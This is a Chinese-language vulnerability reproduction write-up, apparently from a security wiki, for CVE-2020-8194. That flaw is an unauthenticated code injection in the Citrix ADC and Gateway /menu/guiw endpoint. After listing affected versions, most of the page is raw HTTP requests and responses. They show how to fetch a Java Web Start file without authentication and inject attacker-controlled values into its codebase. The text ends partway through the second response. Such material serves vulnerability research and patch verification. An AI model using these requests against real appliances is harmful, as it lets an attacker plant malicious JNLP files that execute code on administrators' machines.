跳转至

(CVE-2020-8194)Citrix 未授权访问导致的任意代码执行漏洞

一、漏洞简介

Citrix ADC和Citrix NetScaler Gateway存在一个代码注入漏洞。未经身份验证的远程攻击者可以利用它来创建恶意文件,如果该恶意文件由管理网络上的受害者执行,则可以允许攻击者在该用户的上下文中执行任意代码。

二、漏洞影响

Citrix ADC and Citrix Gateway: \< 13.0-58.30

Citrix ADC and NetScaler Gateway: \< 12.1-57.18

Citrix ADC and NetScaler Gateway: \< 12.0-63.21

Citrix ADC and NetScaler Gateway: \< 11.1-64.14 

NetScaler ADC and NetScaler Gateway: \< 10.5-70.18

Citrix SD-WAN WANOP: \< 11.1.1a

Citrix SD-WAN WANOP: \< 11.0.3d

Citrix SD-WAN WANOP: \< 10.2.7

Citrix Gateway Plug-in for Linux: \<  1.0.0.137

三、复现过程

通过URL来生成Java Web Start文件,此URL不需要身份验证:

GET /menu/guiw?nsbrand=1&amp;protocol=2&amp;id=3&amp;nsvpx=4 HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: startupapp=st
Upgrade-Insecure-Requests: 1

此时Citrix会为用户返回一个生成的文件,且该文件会被允许连接到Citrix设备之中

HTTP/1.1 200 OK
Date: Tue, 21 Jan 2020 20:32:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2320
Connection: close
Content-Type: application/x-java-jnlp-file

&lt;jnlp codebase="2://citrix.local" href="/menu/guiw?nsbrand=1&amp;protocol=2&amp;id=3&amp;nsvpx=4"&gt;

&lt;information&gt;
&lt;title&gt;GUI citrix.local&lt;/title&gt;
&lt;vendor&gt;Citrix Systems, Inc.&lt;/vendor&gt;
&lt;homepage href="help/im/help.htm"/&gt;
&lt;description&gt;Configuration Utility - Web Start Client&lt;/description&gt;
&lt;icon href="admin_ui/common/images/guiicon.gif"/&gt;
&lt;shortcut online="true"&gt;
&lt;desktop/&gt;
&lt;/shortcut&gt;
&lt;/information&gt;

&lt;security&gt;
&lt;all-permissions/&gt;
&lt;/security&gt;

&lt;resources&gt;
&lt;j2se version="1.6+" initial-heap-size="256M" max-heap-size="256M" /&gt;
&lt;jar href="/admin_ui/php/application/views/applets/gui.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/gui_images.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/gui_view1.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/gui_view2.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/gui_view3.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/gui_view4.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/gui_view5.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/gui_view6.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/gui_view7.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/guicommon.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/ns.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/jnlp.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/sinetfactory.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/sslava.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/pixl.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/looks.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/l2fprod-common-tasks.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/commons-codec.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/java40.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/prefuse.jar"/&gt;
&lt;jar href="/admin_ui/php/application/views/applets/gson.jar"/&gt;
&lt;/resources&gt;

&lt;application-desc main-class="ns.im.Gui"&gt;
&lt;argument&gt;-D&lt;/argument&gt;
&lt;argument&gt;0&lt;/argument&gt;
&lt;argument&gt;-WS&lt;/argument&gt;
&lt;argument&gt;0&lt;/argument&gt;
&lt;argument&gt;-codebase&lt;/argument&gt;
&lt;argument&gt;2://citrix.local&lt;/argument&gt;
&lt;argument&gt;-ns4&lt;/argument&gt;
&lt;argument&gt;1&lt;/argument&gt;
&lt;argument&gt;-ns10&lt;/argument&gt;&lt;argument&gt;4&lt;/argument&gt;&lt;/application-desc&gt;
&lt;/jnlp&gt;

如上所示,用户输入的代码,会直接反馈在输出中,那我们就可以尝试一下执行恶意代码

GET /menu/guiw?nsbrand=HENKA&amp;protocol=wiki.0-sec.org"&gt;&amp;id=HENKC&amp;nsvpx=phpinfo HTTP/1.1
Host: www.0-sec.org

返回值

HTTP/1.1 200 OK
Date: Sun, 26 Jan 2020 12:52:01 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2398
Connection: close
Content-Type: application/x-java-jnlp-file

&lt;jnlp codebase="wiki.0-sec.org"&gt;://www.0-sec.org" href="/menu/guiw?nsbrand=HENKA&amp;protocol=wiki.0-sec.org"&gt;&amp;id=HENKC&amp;nsvpx=phpinfo"&gt;

&lt;information&gt;
&lt;title&gt;GUI citrix.local&lt;/title&gt;
&lt;vendor&gt;Citrix Systems, Inc.&lt;/vendor&gt;